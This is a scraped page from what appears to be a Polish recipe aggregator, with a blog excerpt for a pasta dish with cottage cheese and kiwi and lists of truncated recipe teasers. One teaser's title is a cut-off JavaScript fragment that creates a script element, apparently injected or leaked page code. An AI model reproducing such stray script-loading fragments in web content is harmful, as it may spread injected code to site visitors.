5. Świderki z serkiem wiejskim i kiwi.
Źródło: http://www.poraneknaslodko.pl/2012/12/5-swiderki-z-serkiem-wiejskim-i-kiwi.html
Dzis wyszlo sloneczko, mam nadzieje, ze snieg nie stopnieje, ale z drugiej strony to dobrze, bo troche witaminy D mozna zlapac. Dzisiaj wybieram sie po ozdoby swiateczne, zauwazylam, ze juz kilka balk...
Najnowsze przepisy
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 7
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 18
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 13
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 21
Ta sałatka warstwowa z tuńczykiem to idealny przepis na... ⇖ 40
Przepisy z bloga
Czy racuchy moga byc zdrowe? Oczywiscie!Wystarczy do ich... ⇖ 915
Placki z platkow owsianych to dobra alternatywa dla... ⇖ 932
Kawowe ebelskivers, czyli miniaturowe paczki wywodzace sie... ⇖ 1054
Te sezamowe gofry sa najbardziej chrupiacymi goframi, jakie... ⇖ 988
KREM JAGLANY Z JAGODAMI MAQUI/PRZEPIS WŁASNY/Krem:70 g... ⇖ 1002
Kolejny eksperyment z ciastem przygotowanym ze zdrowych... ⇖ 1093
WEGAŃSKI KREM RYŻOWY/przepis wlasny/70 g platkow ryzowych... ⇖ 879
Zapiekanka z makaronem i twarogiem to danie, ktoremu wieluz... ⇖ 1211
Nie ma chyba takiej osoby, ktora obeszla by sie w kuchni... ⇖ 1890
Rozgrzewajaca i zdrowa zapiekanka, ktora smakuje jak wloski... ⇖ 1000
WEGAŃSKA OWSIANKA BANANOWA Z CZEKOLADĄ/przepis wlasny//1... ⇖ 936
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1810
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1184
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 679
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 565
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 466









































